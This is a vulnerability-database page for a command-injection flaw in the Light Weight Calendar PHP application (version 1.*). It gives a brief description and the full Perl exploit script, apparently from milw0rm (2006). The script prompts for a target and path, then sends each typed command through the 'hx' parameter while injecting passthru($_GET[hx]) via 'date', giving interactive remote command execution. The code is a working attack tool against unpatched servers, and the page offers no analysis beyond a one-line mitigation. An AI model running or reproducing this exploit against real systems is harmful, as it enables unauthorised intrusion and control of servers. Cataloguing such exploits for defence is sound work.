header-logo
Suggest Exploit
vendor:
Light Weight Calendar
by:
Hessam-x
9.3
CVSS
HIGH
Command Injection
78
CWE
Product Name: Light Weight Calendar
Affected Version From: 1.*
Affected Version To: 1.*
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Light Weight Calendar Exploit

This exploit allows an attacker to execute arbitrary commands on the vulnerable Light Weight Calendar application. The attacker can send a malicious HTTP request to the vulnerable application with a crafted payload in the 'hx' parameter of the 'index.php' page. This payload will be executed on the server side.

Mitigation:

The application should validate user input and filter out any malicious characters.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Light Weight Calendar
# Exploit by Hessam-x (www.hessamx.net)
#
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                                                    #
######################################################
# Name    : Light Weight Calendar                    #
# version : 1.*                                      #
######################################################
use LWP::Simple;

print "-------------------------------------------\n";
print "=          Light Weight Calendar          =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";

      print "Target(www.example.com)\> ";
      chomp($targ = <STDIN>);

      print "path: (/lwc/)\>";
      chomp($path=<STDIN>);

while()
{

     print "command:\>";
     chomp($comd=<STDIN>);
     $expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29";
     $page=get("http://".$targ.$path.$expl) || die "[-] Exploit failed ...\n";

}

# milw0rm.com [2006-03-09]

Navigation

Suggest Exploit

Services By CQR